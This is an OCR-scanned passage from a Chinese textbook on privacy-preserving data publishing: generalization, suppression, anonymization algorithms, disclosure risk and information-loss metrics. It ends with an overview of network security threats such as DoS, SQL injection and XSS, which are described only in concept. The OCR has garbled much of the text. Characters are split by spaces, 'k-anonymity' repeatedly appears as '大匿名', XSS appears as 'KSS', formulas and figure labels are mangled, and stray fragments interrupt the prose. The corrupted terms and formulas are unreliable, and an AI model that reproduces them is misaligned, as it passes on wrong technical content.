等 价 类 与 匿名 化 数据 表 中 敏感 属性 值 的 分 布 差异 ， 研 究 人 员 引 入 了 一 种 独特 的 距离 度量 
方式 EMD (Earth Mover’s Distance)， 该 距离 度量 范式 对 数值 型 敏感 属性 值 和 类 别 型 敏 
感 属性 值 均 定 义 了 相应 的 计算 方式 ， 解 决 了 针对 敏感 属性 值 的 偏 斜 性 攻击 和 相似 性 攻 
击 。 但 是 匿名 化 的 结果 是 降低 了 发 布 数据 的 可 用 性 ， 提 高 发 布 数据 可 用 性 的 唯一 办 法 是 
HKEE to 

(5) 个 性 化 匿名 

前 面 提 到 的 匿名 化 原则 仅 提 供 表 级 别 的 保护 粒度 ， 对 表 中 所 有 敏感 属性 值 提供 相同 
程度 的 保护 ， 并 未 考虑 其 相应 的 语义 关系 ， 造 成 大 量 不 必要 的 信息 损失 。 研 究 人 员 提 出 
了 个 性 化 匿名 〈Personalized Anonymity) 的 概念 ， 并 给 出 个 性 化 匿名 的 一 般 方法 。 所 谓 
个 性 化 匿名 是 指 对 数据 表 中 不 同 敏感 属性 值 提供 不 同 粒度 的 隐私 保护 程度 ， 从 而 减少 了 
因 统一 匿名 化 所 带 来 的 信息 损失 。 

(6) 动态 数据 匿名 化 

目前 大 部 分 匿名 化 原则 都 是 针对 静态 数据 的 ， 并 未 考虑 数据 记录 动态 更 新 后 重 发 布 
的 隐私 保护 问题 。 数 据 的 动态 更 新 在 现实 中 是 极为 常见 的 ， 然 而 如 果 我 们 还 按照 原 有 的 
方法 对 更 新 后 的 数据 集 进行 匿名 化 并 重 发 布 ， 很 可 能 在 多 个 不 同 的 发 布 版 本 间 存 在 推理 
通道 ， 从 而 造成 隐私 泄露 。 有 研究 人 员 基 于 推迟 发 布 、 新 建 等 价 类 思想 提出 了 一 种 支持 
记录 插入 操作 的 动态 从 发 布 匿名 方案 ， 能 够 在 一 定 程度 上 阻止 推理 攻击 所 造成 的 隐私 泄 
露 。 还 有 研究 人 员 给 出 了 一 种 同时 支持 记录 插入 和 记录 删除 操作 的 匿名 方法 ， 通 过 保证 
同时 出 现在 不 同 发 布 版 本 中 的 记录 所 在 的 等 价 类 具有 完全 相同 的 敏感 属性 值 集合 ， 有 效 
解决 了 不 同 版 本 间 的 推理 通道 所 造成 的 隐私 泄露 问题 。 动 态 数 据 重 发 布 所 引起 的 隐私 汇 
露 问题 已 引起 了 研究 者 的 广泛 关注 。 

3. 数据 匿名 化 方法 

目前 提出 的 匿名 化 方法 主要 通过 泛 化 和 抑制 操作 来 实现 ， 该 技术 不 同 于 一 般 的 捏 
1、 扰 乱 和 随机 化 方法 ， 它 们 能 保持 发 布 前 后 数据 的 真实 性 和 一 致 性 。 

(1) tt 

泛 化 的 基本 思想 是 用 更 一 般 的 值 来 取代 原始 属性 值 。 通 常 泛 化 可 分 为 两 种 类 型 : 域 
泛 化 和 值 泛 化 。 

域 泛 化 是 指 将 一 个 给 定 的 属性 域 泛 化 成 一 般 域 。 如 ， 属 性 DATA 原始 域 
D, = {430072,430071,430173,430174} 被 泛 化 成 DD = {4300**,4301**} ， 以 便 在 语义 上 表 
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达 一 个 更 大 的 范围 如 图 5-23 所 示 。 经 过 连续 多 次 泛 化 形成 的 域 泛 化 层次 结构 称 之 为 域 
泛 化 层 ， 记 为 DGH 。 

值 泛 化 是 指 原始 属性 域 中 的 每 个 值 直接 泛 化 成 一 般 域 中 的 唯一 值 ， 如 图 5-24 所 示 。 
值 泛 化 关系 同样 决定 了 值 泛 化 层 的 存在 ， 即 为 VGH 。 


Dap 
Diao) peee 
t 430%** 
D,={4300**,4301**} De A 
Ds={430072,430071,430173,430174} 430072 430071 430173 430174 
图 5-23 包含 抑制 的 DATA 域 泛 化 层 图 5-24 包含 抑制 的 DATA 值 泛 化 层 


给 定数 据 表 PT(A s4) 针对 每 个 属性 么 给 定 其 域 泛 化 层 PGHB4s， 则 属性 级 上 的 
所 有 可 能 的 泛 化 数目 为 ， 了 [( DOH 1+D ， 数 据 单元 级 上 的 所 有 可 能 的 泛 化 数目 为 : 
i=l 


相 TdpGzrsl+D" ， 其 中 为 数据 表 中 的 属性 个 数 ，n 为 记录 个 数 。 


i=1 

(2) 抑制 

抑制 又 成 隐匿 , 是 指 用 最 一 般 化 的 值 取代 原始 属性 值 。 如 图 5-24 1E VGH po 中 
处 于 项 层 的 “最 大 值 ” 即 为 该 属性 每 个 值 抑制 操作 的 结果 。 在 大 匿名 化 过 程 中 ， 若 某 些 
记录 无 法 满足 大 匿名 要 求 ， 则 一 般 采 用 抑制 操作 。 被 抑制 的 相应 属性 值 所 在 记录 要 么 从 
数据 包 中 删除 ， 要 么 相应 属性 值 用 “*” 填 充 ， 以 保持 有 关 统 计 特性 。 

4. 数据 匿名 化 算法 

大 部 分 匿名 化 算法 关注 于 如 何 根据 通用 匿名 原则 更 好 地 发 布 匿名 数据 ， 还 有 一 部 分 
工作 致力 于 解决 在 具体 的 应 用 背景 下 ， 如 何 发 布 匿名 数据 才能 更 加 实用 。 另 外 ， 最 近 几 
年 出 现 了 采用 聚 类 思想 进行 匿名 化 的 算法 ,能 在 数据 精度 和 计算 开销 间 达 到 较 好 的 平衡 。 
下 面 分 别 对 这 三 方面 工作 进行 介绍 。 

(1) 基于 通用 原则 的 匿名 化 算法 

在 不 同 的 情况 下 ， 实 现 匿 名 化 的 算法 有 多 种 度量 方法 可 以 采用 ， 例 如 数据 的 信息 缺 
损 、 等 价 类 所 包含 的 平均 记录 数 、 可 识别 度量 (Discernability Metircs)、 实 现 数据 匿 名 的 
操作 数 等 。 通 常 采用 泛 化 技术 来 实现 最 优化 的 天 匿名 原则 算法 ， 对 泛 化 空间 的 搜索 直接 
影响 到 算法 的 整体 性 能 。 然 而 ， 在 很 多 简单 限制 条 件 下 ， 设 计 最 优化 大 匿名 算法 已 经 被 
证 明 是 NP 难 问题 。 因 此 ， 很 大 一 部 分 大 匿名 算法 都 致力 于 设计 相对 来 说 更 加 高 效 的 近 


Eq 
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似 算法 。 

如 图 5-25 所 示 ， 基 于 通用 原则 的 匿名 化 算法 包含 泛 化 空间 枚 举 、 空 间 修 建 、 选 取 最 
优 泛 化 、 结 果 判 断 与 输出 等 步骤 。 一 种 广泛 应 用 的 大 匿名 算法 是 Incognito， 它 首先 构建 
包含 所 有 全 域 泛 化 〈 一 种 全 局 重 编码 技术 ) 方案 的 泛 化 图 (Generalization Graph)， 然 后 
自 底 向 上 对 原始 数据 进行 泛 化 ， 每 次 选取 最 优 泛 化 方案 前 ， 预 先 对 泛 化 图 进行 修剪 以 缩 
小 搜索 范围 ， 不 断 进行 以 上 操作 直到 数据 满足 匿名 原则 。 其 他 优化 的 大 匿名 算法 基本 
上 也 是 采用 修剪 泛 化 空间 来 提高 性 能 ， 它 们 大 多 都 是 基于 匿名 算法 ， 不 同 之 处 在 于 判 
断 算法 结束 的 条 件 ， 而 泛 化 策略 、 对 搜索 空间 的 修剪 等 都 基本 相同 。 


泛 化 空间 枚 举 — Pa ] -| ia 一 YC) 


原始 数据 输出 


N 
图 5-25 ”基于 通用 原则 的 匿名 化 算法 流程 

(2) 面向 特定 应 用 的 匿名 化 算法 

在 特定 的 应 用 场景 下 ， 前 面 介 绍 的 通用 型 匿名 化 算法 可 能 会 不 能 满足 要 求 ， 因 此 需 
要 根据 实际 情况 设计 更 有 针对 性 的 匿名 化 算法 。 例 如 ， 如 果 数 据 拥有 者 希望 利用 发 布 的 
匿名 数据 构建 一 个 分 类 器 ， 那 么 设计 的 匿名 化 算法 在 考虑 保护 隐私 的 同时 ， 还 需要 考虑 
怎样 使 发 布 的 数据 更 有 利于 分 类 器 的 构建 ， 并 且 采 用 的 度量 指标 要 能 直接 反映 出 对 分 类 
器 构建 的 影响 。 现 有 的 两 类 匿名 化 算法 : 自 底 向 上 和 自 项 向 下 ， 都 采用 了 信息 增益 
(Information Gain) 作为 度量 指标 。 发布 的 数据 信息 丢失 越 少 , 构建 的 分 类 器 效果 将 越 好 。 
自 底 向 上 的 匿名 化 算法 通过 每 一 次 搜索 泛 化 空间 ， 采 用 使 信息 丢失 最 少 的 方案 进行 泛 化 E 
复 执行 以 上 操作 直到 数据 满足 匿名 原则 的 要 求 。 自 项 向 下 的 匿名 化 算法 操作 过 程 刚好 相反 。 

G) 基于 聚 类 的 匿名 化 算法 

基于 聚 类 的 匿名 化 算法 将 原始 数据 集 映 射 到 特定 的 度量 空间 中 ， 青 对 这 个 空间 中 的 
数据 进行 聚 类 来 实现 数据 匿名 。 与 大 匿名 化 原则 类 似 ， 算 法 能 够 保证 每 个 聚 类 中 至 少 有 
大 个 数据 点 。 


5-10 聚 类 后 的 数据 


年 龄 性 别 邮编 肤色 记录 数 疾病 
胃 溃 疡 
消化 不 良 
肺炎 
支气管 炎 
流感 
肺炎 


20 男 430000 黄色 4 


30 女 230015 白色 2 
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r-gather 算法 Aggarwal G 等 人 提出 ， 它 要 达到 的 目标 是 对 所 有 数据 点 进行 聚 类 ， 在 
保证 每 个 聚 类 至 少 包含 k 个 数据 点 的 同时 ， 也 使 所 有 聚 类 的 最 大 半径 尽 可 能 小 。 采 用 
2-gather 算法 对 原始 数据 进行 聚 类 之 后 发 布 的 结果 见 表 5-10。 由 于 发 布 的 结果 中 只 包含 
聚 类 中 心 、 半 径 以 及 相关 的 敏感 属性 值 ， 从 而 实现 了 个 人 敏感 信息 的 隐藏 。 


5.5.3 ”隐私 度量 与 评估 标准 


隐私 保护 技术 在 保护 隐私 数据 的 同时 ， 需 要 最 大 可 能 地 保证 数据 的 可 用 性 ， 即 保证 
数据 对 实际 应 用 的 价值 。 下 面 分 别 介绍 隐私 的 度量 方法 以 及 对 儿 种 隐私 保护 技术 的 评估 
标准 。 

1. 隐私 的 度量 方法 

通常 从 披露 风险 和 信息 缺损 两 个 角度 对 隐私 保护 的 效果 进行 度量 。 

(1) 披露 风险 

数据 隐私 的 保护 效果 是 通过 攻击 者 披露 隐私 的 多 少 来 侧面 反映 的 。 现 有 的 隐私 度量 
都 可 以 统一 用 “披露 风险 ”(Disclosure Risk) 来 描述 。 披 露 风险 表示 为 攻击 者 根据 所 发 
布 的 数据 和 其 他 背景 知识 (Background Knowledge) 可 能 披露 隐私 的 概率 。 通 常 ， 关 于 
隐私 数据 的 背景 知识 越 多 ， 披 露 风险 越 大 。 

若 s 表示 敏感 数据 ， 事 件 % 表示 “攻击 者 在 背景 知识 天 的 帮助 下 揭露 敏感 数据 s”, 
则 披露 风险 r(s, 天 ) 表示 为 


r(s,K)=P(S,) 

对 数据 集 而 言 , 若 数 据 所 有 者 最 终 发 布 数 据 集 D 的 所 有 敏感 数据 的 披露 风险 都 小 于 
闪 值 w ，Q e[0,1] ， 则 称 该 数据 集 的 披露 风险 为 4 。 例 如 ， 静 态 数据 发 布 原则 1-diversity 
保证 发 布 数 据 集 的 披露 风险 小 于 1/1, 动态 数据 发 布 原则 m-Invariance 保证 发 布 数据 集 的 
披露 风险 小 于 1/m 。 

特别 地 ， 不 做 任何 处 理 所 发 布 数 据 集 的 披露 风险 为 1， 当 所 发 布 数 据 集 的 披露 风险 
为 0 时， 这 样 发 布 的 数据 被 称 为 实现 了 完美 隐私 (Perfect Privacy)。 完 美 隐私 实现 了 对 
隐私 最 大 程度 的 保护 ， 但 由 于 对 攻击 者 先 验 知识 的 假设 本 身 是 不 确定 的 ， 因 此 实现 对 隐 
私 的 完美 保护 也 只 在 具体 假设 、 特 定 场景 下 成 立 ， 真 正 的 完美 保护 并 不 存在 。 

(2) 信息 缺损 

信息 缺损 表示 经 过 隐私 保护 技术 处 理 之 后 原始 数据 的 信息 丢失 量 ， 是 针对 发 布 数据 
集 质 量 的 一 种 度量 方法 。 一 般 情况 下 ， 隐 私 保护 技术 需要 遵循 最 小 信息 缺损 原则 ， 该 原 
则 通过 比较 原始 数据 和 匿名 数据 的 相似 度 来 衡量 隐私 保护 的 效果 。 信 息 缺 损 越 小 ， 说 明 
发 布 的 数据 集 有 效 性 越 高 ， 数 据 越 有 价值 。 但 是 ， 这 种 度量 原则 需要 考虑 准 标识 符 中 每 
个 属性 的 每 个 取 值 的 泛 化 和 隐匿 带 来 的 信息 缺损 ， 计 算 代价 较 高 ， 适 用 于 对 单个 属性 进 
行 度量 。 


Bo B 


Boo 
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另外 ， 还 有 一 种 工 oss 度量 标准 ， 它 要 求 检查 每 条 准 标识 符 记 录 中 每 个 属性 的 取 值 
泛 化 带 来 的 信息 缺损 ， 进 而 能 够 计算 出 每 条 记录 泛 化 后 的 信息 缺损 ， 再 根据 每 条 记录 的 
信息 计算 ， 计 算出 整个 发 布 数据 集 的 信息 缺损 。 

2. 隐私 保护 算法 的 评估 标准 

通过 前 面 5.6.3 节 对 一 些 隐私 保护 技术 的 介绍 可 以 看 出 ， 在 进行 隐私 保护 数据 挖掘 
研究 时 ， 选 择 符合 实际 需求 的 隐私 保护 算法 是 非常 有 必要 的 。 同 样 在 进行 应 用 开发 的 时 
候 ， 采 用 哪 一 种 隐私 保护 算法 也 是 值得 考虑 的 。 关 于 隐私 保护 技术 的 评估 ， 最 重要 的 工 
作 就 是 要 建立 合适 的 评价 标准 和 相关 的 参考 标准 。 然 而 ， 在 实际 应 用 中 ， 很 难 用 同一 个 
标准 来 衡量 所 有 的 隐私 保护 技术 。 或 者 说 ， 没 有 一 种 隐私 保护 技术 所 实现 的 算法 能 够 在 
所 有 的 衡量 标准 上 优 于 其 他 的 隐私 保护 技术 算法 。 可 以 确定 的 是 , 针对 一 个 特定 的 应 用 ， 
存在 一 种 算法 能 够 比 其 他 算法 更 符合 某 个 标准 。 因 此 ， 应 该 提供 一 套 度量 准则 ， 让 用 户 
根据 自己 特定 的 应 用 需求 选择 合适 的 隐私 保护 技术 。 通 常 ， 隐 私 保护 算法 可 以 从 下 列 方 
面 进行 评价 和 比较 : 

(1) 隐私 保护 度 

隐私 保护 度 是 站 在 隐私 保护 的 角度 对 隐私 保护 算法 进行 评估 ， 该 算法 如 何 能 够 最 大 
限度 地 防止 入 侵 者 非法 获取 隐私 数据 ， 对 隐私 进行 有 效 的 保护 。 通 常 通 过 发 布 数据 的 披 
露 风险 来 反映 隐私 保护 度 ， 披 露 风险 越 小 ， 隐 私 保护 度 越 高 。 在 现 有 的 算法 中 ， 隐 私 保 
护 度 是 一 个 最 基本 的 方面 ， 各 个 算法 都 从 不 同 的 角度 进行 了 实现 。 例 如 : 在 安全 多 方 计 
算 中 ， 保 证 参与 计算 的 各 节点 不 能 了 解 到 其 他 节点 的 原始 数据 ， 只 能 知道 最 后 的 挖 握 结 
果 。 数 据 匿 名 化 技术 中 隐私 保护 度 主 要 是 根据 设 定 同 时 混淆 的 个 体 数 据 来 决定 ， 如 k-i 
名 化 技术 中 的 大 值 设 定 。 选 择 混淆 的 程度 越 大 ， 隐 私 就 保护 的 就 越 好 ， 根 据 现 有 信息 推 
断 出 确定 个 体 的 可 能 性 就 越 少 。 在 基于 数据 失真 的 隐私 保护 技术 中 ， 隐 私 保护 度 是 通过 
扭曲 原始 数据 来 实现 的 。 

不 同 的 隐私 保护 算法 都 设 定 了 一 个 特定 的 数据 模型 ， 而 且 这 些 算法 都 针对 非法 入 侵 
者 进行 了 一 个 重要 的 假定 ， 即 所 有 的 非法 入 侵 者 都 是 采用 相同 的 入 侵 手 段 来 窃取 隐私 。 
在 实际 应 用 环境 中 ， 这 个 假设 显然 是 理想 化 的 ， 也 是 不 太 合理 的 。 综 合 来 看 ， 前 面 提 到 
的 不 同 隐私 保护 算法 ， 所 能 做 到 的 隐私 保护 度 都 是 有 限 的 。 

(2) 数据 有 效 性 

数据 有 效 性 是 指 隐 私 保护 算法 在 处 理 数据 的 时 候 ， 对 原始 信息 的 修改 使 得 挖掘 结 
果 ， 也 即 最 终 得 出 的 全 局 关联 规则 ， 与 原始 数据 之 间 关 系 的 匹配 程度 。 它 是 对 发 布 数据 
质量 的 度量 ， 反 映 了 通过 隐私 保护 技术 之 后 ， 原 始 数据 的 信息 丢失 程度 。 数 据 缺损 的 越 
多 ， 信 息 丢 失 的 越 多 ， 数 据 的 有 效 性 就 会 越 差 。 

数据 有 效 性 也 同样 能 够 反映 挖掘 结果 的 有 效 性 、 可 用 性 。 很 多 的 隐私 保护 算法 使 用 
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混淆 、 伪 造 等 技术 对 原始 数据 进行 修改 ， 而 且 主要 是 针对 其 中 的 隐私 数据 进行 处 理 。 这 
样 就 导致 处 理 后 的 数据 如 果 经 过 数据 挖掘 之 后 得 出 的 结果 是 错误 的 ， 或 者 说 该 结果 不 能 
反映 真实 状况 。 在 这 样 的 情况 下 ， 原 始 的 数据 就 失去 了 该 有 的 价值 ， 而 这 样 处 理 数据 的 
隐私 保护 算法 也 就 同样 失去 了 效用 。 因 而 在 考虑 保护 个 人 隐私 的 同时 ， 算 法 还 要 能 在 整 
体 上 反映 出 规则 联系 。 

G) 算法 复杂 度 

算法 的 复杂 度 一 般 指 算法 的 时 间 复 杂 性 和 空间 复杂 性 ， 即 算法 的 执行 时 间 和 进行 数 
据 处 理 时 消耗 的 系统 资源 ， 可 以 说 算法 复杂 度 是 直接 与 计算 效率 相关 的 一 条 重要 标准 。 

算法 复杂 性 的 高 低 主要 体现 在 所 需要 的 系统 资源 上 。 所 需 资源 越 多 ， 该 算法 的 复杂 
性 就 越 高 ， 反 之 ， 所 需 资源 越 少 ， 该 算法 的 复杂 性 就 越 低 。 重 要 的 系统 资源 一 般 包 括 时 
间 和 空间 ， 那 么 需要 时 间 资 源 的 数量 就 称 为 时 间 复 杂 性 ， 需 要 空间 资源 的 数量 就 称 为 空 
间 复 杂 性 。 另 外 ， 在 分 布 式 环境 下 ， 为 了 共同 挖掘 知识 ， 各 个 站 点 之 间 需 要 频繁 地 交换 
大 量 信息 ， 这 样 通信 复杂 性 也 就 成 为 衡量 分 布 式 算法 性 能 的 一 个 重要 指标 。 毫 无 疑问 ， 
为 了 保护 数据 隐私 , 各 个 站 点 都 会 对 发 送 的 信息 进行 加 密 处 理 , 由 此 产生 的 通信 开销 对 算法 
性 能 的 影响 是 巨大 的 。 如 何 设计 复杂 度 更 低 的 算法 是 各 类 隐私 保护 技术 所 追求 的 重要 目标 。 

(4) 算法 扩展 性 

算法 扩展 性 指 隐私 保护 算法 在 处 理 海量 数据 集 或 者 数据 量 急 剧 增 大 时 的 应 变 能 力 。 
算法 扩展 性 的 好 坏 直 接 反 映 在 当 所 处 理 的 数据 量 突然 增多 的 时 候 ， 算 法 的 处 理 效率 是 否 
受到 剧烈 的 影响 。 显 而 易 见 ， 一 个 扩展 性 好 的 隐私 保护 算法 在 数据 量 增 大 的 同时 ， 其 处 
理 效 率 的 变化 应 该 是 相对 缓慢 的 。 

算法 的 扩展 性 在 某 种 意义 上 是 与 其 复杂 性 息息相关 的 ， 算 法 的 复杂 度 会 间接 影响 到 
其 扩展 性 。 例 如 ， 基 于 数据 失真 的 隐私 保护 技术 在 处 理 数据 时 ， 算 法 从 时 间 复 杂 度 上 来 
讲 是 相对 较 低 的。 但 是 在 空间 复杂 度 方面 ， 由 于 其 要 遍历 整个 数据 库 ， 计 算 其 中 的 频繁 
集 ， 因 此 对 内 存 资 源 的 消耗 是 很 大 的 。 特 别 是 当 数 据 库 中 的 数据 量 急 剧 增 大 的 时 候 ， 其 
处 理 效率 会 显著 降低 ， 扩 展 性 不 好 。 
容易 看 出 ， 每 种 隐私 保护 技术 都 有 各 自 的 优 缺 点 ， 在 不 同 的 应 用 需求 下 ， 它 们 的 适 
用 范围 、 性 能 表现 等 存在 较 大 差异 。 从 表 5-11 可 以 看 出 ， 当 需要 对 特定 数据 进行 隐私 保 
护 并 且 对 计算 开销 要 求 比较 高 时 ， 可 以 选择 基于 数据 失真 的 隐私 保护 技术 ， 而 当 用 户 更 
关注 于 对 隐私 的 保护 程度 甚至 要 求实 现 完美 保护 时 ， 则 基于 数据 加 密 的 隐私 保护 技术 会 
更 加 合适 , 但 代价 是 较 高 的 计算 开销 在 分 布 式 环境 下 ,还 会 增加 一 定 的 通信 开销 )。 基 
于 数据 匿名 化 的 隐私 保护 技术 在 各 方面 都 比较 平衡 ， 能 以 较 低 的 计算 开销 和 信息 缺损 实 
现 对 隐私 的 保护 。 表 5-12 对 隐私 保护 技术 进行 了 进一步 的 对 比分 析 。 
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隐私 保护 技术 


表 S-1 隐私 保护 技术 的 性 能 评估 
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表 5-12 隐私 保护 技术 的 对 比分 析 
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6.1 网 络 安全 需求 分 析 与 基本 设计 


6.1.1 网 络 安全 威胁 概述 


由 于 无 处 不 在 的 Internet 和 移动 互联 网 的 出 现 ， 企 图 侵入 、 破 坏 和 丑化 商用 和 企业 
网 络 的 尝试 就 变 得 源源 不 断 和 日 益 独 狐 起 来 。 计 算 机 网 络 作为 重要 的 基础 资源 向 客户 提 
供 信 息 ， 而 建立 安全 的 网 络 系统 所 要 解决 的 根本 问题 是 ， 在 保证 网 络 连通 的 同时 ， 对 网 
络 服务 、 客 户 应 用 进行 管理 ， 以 保证 网 络 信 息 资源 的 正确 性 不 受 影响 。 随 着 Intemet 和 
以 电子 商务 、 社 交通 讯 为 代表 的 网 络 应 用 日 益 发 展 ， 网 络 安 全 对 于 个 人 、 国 家 已 经 变 得 
越 来 越 重 要 。 

伴随 着 信息 化 的 快速 发 展 ， 信 息 网 络 安全 形势 愈加 严峻 。 信 息 安全 攻击 手段 向 简单 
化 、 综 合 化 演变 ， 攻 击 形式 却 向 多 样 化 、 复 杂 化 发 展 ， 病 毒 、 蠕 虫 、 垃 圾 邮件 、 僵 尸 网 
络 等 攻击 持续 增长 。 网 络 安全 所 面临 的 各 种 威胁 越 来 越 多 。 总 体 来 说 ， 网 络 所 面临 的 威 
胁 是 多 种 多 样 的 ， 可 以 分 为 网 络 基础 设施 的 安全 威胁 、 网 络 主机 的 安全 威胁 以 及 网 络 客 
户 的 安全 威胁 ， 也 可 以 划分 为 网 络 内 部 的 安全 威胁 和 网 络 外 部 的 安全 威胁 。 

网 络 安全 在 维基 百科 上 面 的 定义 是 ， 网 络 安全 包括 网 络 设备 安全 、 网 络 信息 安全 、 
网 络 软件 安全 。 黑 客 通 过 基于 网 络 的 入 侵 来 达到 窃取 敏感 信息 的 目的 ， 也 有 人 以 基于 网 
络 的 攻击 见长 ， 被 人 收买 通过 网 络 来 攻击 商业 竞争 对 手 企 业 ， 造 成 企业 网 络 无 法 正常 运 
行 ， 网 络 安全 就 是 为 了 防范 这 种 信息 盗窃 和 商业 竞争 攻击 所 采取 的 措施 。 网 络 安全 也 有 
自己 的 属性 。 通 过 这 些 属性 ， 就 能 够 对 一 个 系统 的 网 络 安全 的 级 别 进行 判断 和 分 级 。 

网 络 安全 的 目标 就 是 要 实现 信息 系统 的 基本 安全 特征 ( 即 网 络 安全 基本 属性 )， 并 达 
到 网 络 通信 所 需 的 保障 级 别 。 网 络 安全 的 基本 属性 包括 机 密 性 、 完 整 性 、 可 用 性 、 可 追 
究 性 和 抗 否认 性 等 。 机 密 性 指 系统 之 间 的 模块 不 被 非 授 权 者 所 获取 或 利用 的 特性 ， 包 括 
数据 机 密 和 访问 控制 等 方面 。 完 整 性 指 系统 的 展示 以 及 传递 的 信息 真实 、 准 确 和 完备 ， 
不 被 冒充 、 伪 造 和 算 改 的 特性 ， 包 括 身份 真实 、 数 据 完整 和 系统 完整 等 方面 。 可 用 性 指 
网 络 可 被 授权 者 需要 的 时 候 访 问 和 使 用 的 特性 。 可 追究 性 指 从 一 个 实体 的 行为 能 够 唯一 
追溯 到 该 实体 的 特性 ， 可 以 支持 故障 隔离 ， 攻 击 阻 断 和 事后 恢复 。 抗 否认 性 指 一 个 实体 
不 能 够 否认 其 行为 的 特征 ， 可 以 支持 责任 追究 、 威 慑 作用 和 法 律 行动 。 网 络 安全 的 这 些 
属性 在 具体 实现 中 的 所 达到 的 级 别 决定 了 此 网 络 可 以 被 完全 信任 的 程度 。 
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与 网 络 安全 对 应 的 就 是 安全 威胁 。 由 于 计算 机 网 络 具有 联结 形式 多 样 性 、 终 端 分 布 
不 均匀 性 和 网 络 的 开放 性 、 互 连 性 、 移 动 性 等 特征 ， 致 使 网 络 易 受 黑客 、 恶 意 软件 和 其 
他 恶意 的 攻击 。 

目前 尚 没有 统一 的 方法 对 各 种 威胁 加 以 区 分 和 分 类 ， 也 难以 完全 理 清 各 种 威胁 之 间 
的 相互 关系 。 不 同 威胁 的 存在 及 其 严重 性 随 着 环境 的 变化 而 变化 。 为 了 解释 更 好 地 对 不 
同类 型 的 网 络 威胁 进行 分 类 ， 以 下 是 对 基本 的 威胁 进行 一 个 简单 的 分 类 。 安 全 威胁 可 以 
大 致 分 为 网 络 基础 设施 威胁 、 网 络 主机 (服务 ) 威 胁 、 网 络 客户 的 安全 威胁 ， 也 可 以 分 为 
网 络 内 部 威胁 、 网 络 外 部 威胁 。 

网 络 基础 设施 威胁 : 主要 指 的 是 对 于 系统 运行 环境 中 的 物理 环境 和 通信 和 链 路 的 威 
胁 。 网 络 物理 安全 是 整个 网 络 系统 安全 的 前 提 。 物 理 安全 的 威胁 主要 有 地 震 、 水 灾 、 火 
灾 等 环境 事故 造成 整个 系统 毁灭 、 电 源 故 障 造成 设备 断 电 导致 操作 系统 引导 失败 或 数据 
库 新 信息 丢失 、 设 备 被 盗 、 被 毁 造 成 数据 丢失 或 信息 泄漏 以 及 数据 信息 的 窃取 或 偷 阅 等 
等 。 除 此 之 外 ， 网 络 入 侵 者 还 有 可 能 在 传输 线路 上 安装 窃听 装置 ， 穷 取 系统 敏感 信息 ; 
或 者 干扰 链 路 、 破 坏 数据 的 完整 性 。 

网 络 主机 (服务 ) 威 胁 : 网 络 主机 的 威胁 实际 上 指 的 就 是 为 用 户 提供 服务 的 系统 所 受 
到 的 安全 威胁 。 网 络 主机 威胁 最 常见 的 是 来 自 于 DoS( 中 文 为 拒绝 服务 攻击 ) 的 攻击 。 DoS 
攻击 一 般 是 会 通过 大 量 合法 或 伪造 的 请 求 占 用 大 量 网 络 以 及 器 材 资源 来 消耗 系统 的 带宽 
或 者 资源 来 以 达到 瘫痪 网 络 以 及 系统 的 目的 。DoS 攻击 目前 是 最 强大 、 最 难 防御 的 攻击 
之 一 。 除 了 DoS 攻击 之 外 ， 还 有 例如 通过 攻击 主机 提供 的 服务 来 获取 到 服务 器 的 权限 ， 
从 而 威胁 到 主机 本 身 和 主机 上 数据 资源 的 安全 ,其 中 最 常见 的 手法 如 SQL 注入 、 恶意 文 
件 上 传 、 其 他 漏洞 攻击 等 。 

网 络 客户 安全 威胁 : 网 络 客户 的 威胁 主要 是 指 恶意 的 攻击 者 去 攻击 终端 的 用 户 ， 包 
括 用 户 、 浏 览 器 和 手机 或 者 电脑 上 面 的 应 用 程序 。 网 络 钓鱼 就 是 一 个 典型 的 网 络 客户 安 
全 的 威胁 。 利 用 用 户 的 安全 意识 不 够 来 窃取 用 户 的 敏感 信息 。 还 有 类 似 于 KSS 攻击 。 
KSS 攻击 通过 在 浏览 器 中 插入 JavaScript 的 脚本 来 获取 用 户 的 Cookie 等 信息 。 例 如 口令 
破解 ， 就 是 在 客户 端 上 不 断 地 尝试 猜测 用 户口 令 。 对 于 人 的 攻击 最 常见 的 就 是 社会 工程 ， 
通过 社会 工程 的 方式 可 以 用 来 欺骗 系统 中 的 用 户 以 获得 手机 信息 、 计 算 机 系统 的 访问 权 
限 。 由 于 所 有 的 社会 工程 学 攻击 都 建立 在 人 决断 产生 认 知 偏差 的 基础 上 ， 所 以 相 较 于 网 
络 基础 设施 威胁 和 网 络 主机 威胁 ,社会 工程 学 的 攻击 一 般 是 很 难 通 过 技术 上 予以 防范 的 。 
通常 的 做 法 一 般 都 是 加 强 职员 、 客 户 的 安全 意识 ， 同 时 加 强 对 系统 的 管理 。 

对 于 网 络 来 说 ， 由 于 网 络 的 结构 不 同 ， 面 临 的 威胁 存在 差异 。 当 网 络 结构 中 与 因 特 
网 相连 ， 则 由 于 因特网 的 开发 性 、 国 际 性 与 无 安全 管理 性 ， 使 得 网 络 威胁 的 来 源 又 可 以 
分 为 网 络 外 部 的 威胁 、 网 络 内 部 的 威胁 。 

网 络 外 部 的 威胁 : 如 果 系 统 内 部 局 域 网 络 与 外 部 网 络 间 没有 采取 一 定 的 安全 防护 措 
施 ， 内 部 网 络 容易 遭 到 来 自 外 网 入 侵 者 的 攻击 。 例 如 ， 通 过 网 络 监 听 等 先进 手段 获得 内 
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部 网 络 用 户 的 用 户 名 、 口 令 等 信息 ， 进 而 假冒 内 部 合法 身份 进行 非法 登录 ， 窃 取 内 部 网 
重要 信息 ; 通过 发 送 大量 数 据 包 对 内 部 网 络 重要 服务 器 进行 攻击 ， 使 得 内 部 网 络 超 负荷 
工作 以 致 拒绝 服务 甚至 系统 瘫痪 等 等 。 

相对 于 网 络 外 部 所 部 署 的 安全 防范 措施 ， 网 络 内 部 的 安全 措施 是 十 分 的 薄弱 的 。 所 
以 一 旦 网 络 内 部 受到 了 巨大 的 威胁 ， 那 么 对 于 整个 系统 来 说 都 是 十 分 严重 的 。 而 网 络 内 
部 在 一 般 情况 下 ， 恶 意 的 攻击 者 是 很 难 进 入 的 。 在 大 多 数 情 况 下 ， 网 络 内 部 的 威胁 主要 
是 来 自 于 内 部 人 员 。 比如 内 部 人 员 安 全 意识 薄弱 , 将 系统 中 的 重要 口令 放 在 明显 的 地 方 ， 
容易 泄漏 或 者 是 在 网 络 上 下 载 了 木马 程序 或 者 是 病毒 程序 ， 导 致 内 网 受到 感染 ， 威 胁 到 
整个 内 网 的 安全 ， 内 部 人 员 故 意 或 者 误 用 网 络 功能 ， 越 权 使 用 网 络 ， 人 窃取 数据 资源 ， 产 
生 严 重 的 后 果 和 损失 。 

